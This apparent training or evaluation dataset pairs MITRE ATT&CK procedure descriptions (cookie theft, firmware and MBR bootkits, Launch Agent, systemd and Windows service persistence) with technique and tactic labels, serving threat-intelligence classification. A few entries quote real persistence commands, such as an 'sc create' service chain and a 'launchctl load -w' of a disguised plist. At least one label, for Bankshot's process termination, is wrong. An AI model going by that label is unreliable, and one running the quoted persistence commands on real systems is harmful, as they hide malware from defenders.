+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Evilnum can steal cookies and session information from browsers.,"Tecnique: T1539 Steal Web Session Cookie, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LuminousMoth has used an unnamed post-exploitation tool to steal cookies from the Chrome browser.,"Tecnique: T1539 Steal Web Session Cookie, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sandworm Team used information stealer malware to collect browser session cookies.,"Tecnique: T1539 Steal Web Session Cookie, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Scattered Spider retrieves browser cookies via Raccoon Stealer.,"Tecnique: T1539 Steal Web Session Cookie, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BLUELIGHT can harvest cookies from Internet Explorer, Edge, Chrome, and Naver Whale browsers.","Tecnique: T1539 Steal Web Session Cookie, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has used a script that extracts the web session cookie and sends it to the C2 server.,"Tecnique: T1539 Steal Web Session Cookie, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CookieMiner can steal Google Chrome and Apple Safari browser cookies from the victim’s machine.,"Tecnique: T1539 Steal Web Session Cookie, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EVILNUM can harvest cookies and upload them to the C2 server.,"Tecnique: T1539 Steal Web Session Cookie, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can steal the victim's cookies to use for duplicating the active session from another device.,"Tecnique: T1539 Steal Web Session Cookie, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has the ability to capture web session cookies.,"Tecnique: T1539 Steal Web Session Cookie, Tactic: TA0006 Credential Access"
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TajMahal has the ability to steal web session cookies from Internet Explorer, Netscape Navigator, FireFox and RealNetworks applications.","Tecnique: T1539 Steal Web Session Cookie, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: XCSSET uses scp to access the ~/Library/Cookies/Cookies.binarycookies file.,"Tecnique: T1539 Steal Web Session Cookie, Tactic: TA0006 Credential Access"
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hacking Team UEFI Rootkit is a UEFI BIOS rootkit developed by the company Hacking Team to persist remote access software on some targeted systems.,"Tecnique: T1542.001 Pre-OS Boot: System Firmware, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoJax is a UEFI BIOS rootkit deployed to persist remote access software on some targeted systems.,"Tecnique: T1542.001 Pre-OS Boot: System Firmware, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Trojan.Mebromi performs BIOS modification and can download and execute a file as well as protect itself from removal.,"Tecnique: T1542.001 Pre-OS Boot: System Firmware, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Equation is known to have the capability to overwrite the firmware on hard drives from some manufacturers.,"Tecnique: T1542.002 Pre-OS Boot: Component Firmware, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cyclops Blink has maintained persistence by patching legitimate device firmware when it is downloaded, including that of WatchGuard devices.","Tecnique: T1542.002 Pre-OS Boot: Component Firmware, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT28 has deployed a bootkit along with Downdelph to ensure its persistence on the victim. The bootkit shares code with some variants of BlackEnergy.,"Tecnique: T1542.003 Pre-OS Boot: Bootkit, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 deployed Master Boot Record bootkits on Windows systems to hide their malware and maintain persistence on victim systems.,"Tecnique: T1542.003 Pre-OS Boot: Bootkit, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lazarus Group malware WhiskeyAlfa-Three modifies sector 0 of the Master Boot Record (MBR) to ensure that the malware will persist even if a victim machine shuts down.,"Tecnique: T1542.003 Pre-OS Boot: Bootkit, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BOOTRASH is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence.,"Tecnique: T1542.003 Pre-OS Boot: Bootkit, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has installed a bootkit on the system to maintain persistence.,"Tecnique: T1542.003 Pre-OS Boot: Bootkit, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some FinFisher variants incorporate an MBR rootkit.,"Tecnique: T1542.003 Pre-OS Boot: Bootkit, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROCKBOOT is a Master Boot Record (MBR) bootkit that uses the MBR to establish persistence.,"Tecnique: T1542.003 Pre-OS Boot: Bootkit, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot can implant malicious code into a compromised device's firmware.,"Tecnique: T1542.003 Pre-OS Boot: Bootkit, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: WhisperGate overwrites the MBR with a bootloader component that performs destructive wiping operations on hard drives and displays a fake ransom note when the host boots.,"Tecnique: T1542.003 Pre-OS Boot: Bootkit, Tactic: TA0005 Defense Evasion TA0003 Persistence "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Linux has a hardcoded location that it uses to achieve persistence if the startup system is Upstart or System V and it is running as root.,"Tecnique: T1543 Create or Modify System Process, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LITTLELAMB.WOOLTEA can initialize itself as a daemon to run persistently in the background.,"Tecnique: T1543 Create or Modify System Process, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bundlore can persist via a LaunchAgent.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Calisto adds a .plist file to the /Library/LaunchAgents folder to maintain persistence.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CoinTicker creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CookieMiner has installed multiple new Launch Agents in order to maintain persistence for cryptocurrency mining software.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrossRAT creates a Launch Agent on macOS.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dacls can establish persistence via a LaunchAgent.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dok installs two LaunchAgents to redirect all network traffic with a randomly generated name for each plist file maintaining the format com.random.name.plist.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FruitFly persists via a Launch Agent.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Green Lambert can create a Launch Agent with the `RunAtLoad` key-value pair set to true, ensuring the `com.apple.GrowlHelper.plist` file runs every time a user logs in.","Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Keydnap uses a Launch Agent to persist.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Komplex trojan creates a persistent launch agent called with $HOME/Library/LaunchAgents/com.apple.updates.plist with launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacMa installs a `com.apple.softwareupdate.plist` file in the `/LaunchAgents` folder with the `RunAtLoad` value set to `true`. Upon user login, MacMa is executed from `/var/root/.local/softwareupdate` with root privileges. Some variations also include the `LimitLoadToSessionType` key with the value `Aqua`, ensuring the MacMa only runs when there is a logged in GUI user.","Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MacSpy persists via a Launch Agent.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can use launch agents for persistence.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OSX_OCEANLOTUS.D can create a persistence file in the folder /Library/LaunchAgents.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Proton persists via Launch Agent.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ThiefQuest installs a launch item using an embedded encrypted launch agent property list template. The plist file is installed in the ~/Library/LaunchAgents/ folder and configured with the path to the persistent binary located in the ~/Library/ folder.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: macOS.OSAMiner has placed a Stripped Payloads with a `plist` extension in the Launch Agent's folder.,"Tecnique: T1543.001 Create or Modify System Process: Launch Agent, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2022 Ukraine Electric Power Attack, Sandworm Team configured Systemd to maintain persistence of GOGETTER, specifying the `WantedBy=multi-user.target` configuration to run GOGETTER when the system begins accepting user logins.","Tecnique: T1543.002 Create or Modify System Process: Systemd Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Rocke has installed a systemd service script to maintain persistence.,"Tecnique: T1543.002 Create or Modify System Process: Systemd Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has established persistence through the creation of a cryptocurrency mining system service using systemctl.,"Tecnique: T1543.002 Create or Modify System Process: Systemd Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Exaramel for Linux has a hardcoded location under systemd that it uses to achieve persistence if it is running as root.,"Tecnique: T1543.002 Create or Modify System Process: Systemd Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Fysbis has established persistence using a systemd service.,"Tecnique: T1543.002 Create or Modify System Process: Systemd Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hildegard has started a monero service.,"Tecnique: T1543.002 Create or Modify System Process: Systemd Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy can be used to establish persistence using a systemd service.,"Tecnique: T1543.002 Create or Modify System Process: Systemd Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Depending on the Linux distribution and when executing with root permissions, RotaJakiro may install persistence using a `.service` file under the `/lib/systemd/system/` folder.","Tecnique: T1543.002 Create or Modify System Process: Systemd Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SysUpdate can copy a script to the user owned `/usr/lib/systemd/system/` directory with a symlink mapped to a `root` owned directory, `/etc/ystem/system`, in the unit configuration file's `ExecStart` directive to establish persistence and elevate privileges.","Tecnique: T1543.002 Create or Modify System Process: Systemd Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2016 Ukraine Electric Power Attack, Sandworm Team used an arbitrary system service to load at system boot for persistence for Industroyer. They also replaced the ImagePath registry value of a Windows service with a new backdoor binary.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation CuckooBees, the threat actors modified the `IKEEXT` and `PrintNotify` Windows services for persistence.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Honeybee, threat actors installed DLLs and backdoors as Windows services.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: An APT19 Port 22 malware variant registers itself as a service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT3 has a tool that creates a new service for persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 modified Windows Services to ensure PowerShell scripts were loaded on the system. APT32 also creates a Windows service to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT38 has installed a new Windows service to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 modified legitimate Windows services to install malware backdoors. APT41 created the StorSyncSvc service to provide persistence for Cobalt Strike.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Blue Mockingbird has made their XMRIG payloads persistent as a Windows Service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak malware installs itself as a service to provide persistence and SYSTEM privileges.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cinnamon Tempest has created system services to establish persistence for deployed tooling.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has created new services to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkVishnya created new services for shellcode loaders distribution.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Earth Lusca created a service using the command sc create “SysUpdate” binpath= “cmd /c start “[file path]””&&sc config “SysUpdate” start= auto&&net
+start SysUpdate for persistence.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FIN7 created new Windows services and added them to the startup directories for persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ke3chang backdoor RoyalDNS established persistence through adding a service called Nwsapagent.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has created new services for persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Several Lazarus Group malware families install themselves as new services.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PROMETHIUM has created new services and modified existing services for persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TeamTNT has used malware that adds cryptocurrency miners as a service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Threat Group-3390's malware can create a new service, sometimes naming it after the config information, to gain persistence.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tropic Trooper has installed a service pointing to a malicious DLL dropped to disk.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has installed TrickBot as a service named ControlServiceA in order to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Anchor can establish persistence by creating a service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AppleJeus can install itself as a service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor's dispatcher can establish persistence by registering a new service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuditCred is installed as a new service on the system.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBSRAT can modify service configurations.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bankshot can terminate a specific process by its process id.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bisonal has been modified to be used as a Windows service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BitPaymer has attempted to install itself as a service to maintain persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Black Basta can create a new service to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: One variant of BlackEnergy creates a new service using either a hard-coded or randomly generated name.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Briba installs a service pointing to a malicious DLL dropped to disk.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbon establishes persistence by creating a service and naming it based off the operating system version running on the current machine.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Catchamas adds a new service named NetAdapter to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can register itself as a system service to gain persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can install a new service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conficker copies itself into the %systemroot%\system32 directory and registers as a service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CosmicDuke uses Windows services typically named ""javamtsup"" for persistence.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: One persistence mechanism used by CozyCar is to register itself as a Windows service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cuba can modify services by using the OpenService and ChangeServiceConfig functions.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DCSrv has created new services for persistence by modifying the Registry.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dtrack can add a service called WBService to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Duqu creates a new service that loads a malicious driver when the system starts. When Duqu is active, the operating system believes that the driver is legitimate, as it has been signed with a valid private key.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre registers itself as a service by adding several Registry keys.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Elise configures itself as a service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emissary is capable of configuring itself as a service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been observed creating new services to maintain persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can utilize built-in modules to modify service binaries and restore them to their original state.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The Exaramel for Windows dropper creates and starts a Windows service named wsmprovav with the description “Windows Check AV.”,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FALLCHILL has been installed as a Windows service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher creates a new Windows service with the malicious executable for persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream has established persistence by running `sc.exe` and by setting the `WSearch` service to run automatically.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can drop itself in `C:\Windows\System32\spool\prtprocs\x64\winprint.dll` as an alternative Print Processor to be loaded automatically when the spoolsv Windows service starts.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GoldenSpy has established persistence by running in the background as an autostart service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GreyEnergy chooses a service, drops a DLL file, and writes it to that serviceDLL Registry key.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper can load drivers by creating a new service using the `CreateServiceW` API.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hydraq creates new services to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Industroyer can use an arbitrary system service to load at system boot for persistence and replaces the ImagePath registry value of a Windows service with a new backdoor binary.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some InnaputRAT variants create a new Windows service to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can register a Windows service named CsPower as part of its execution chain, and a Windows service named clr_optimization_v2.0.51527_X86 to achieve persistence.","Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JHUHUGIT has registered itself as a service to establish persistence.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KONNI has registered itself as a service using its export function.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar can install itself as a new service.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KeyBoy installs a service pointing to a malicious DLL dropped to disk.,"Tecnique: T1543.003 Create or Modify System Process: Windows Service, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
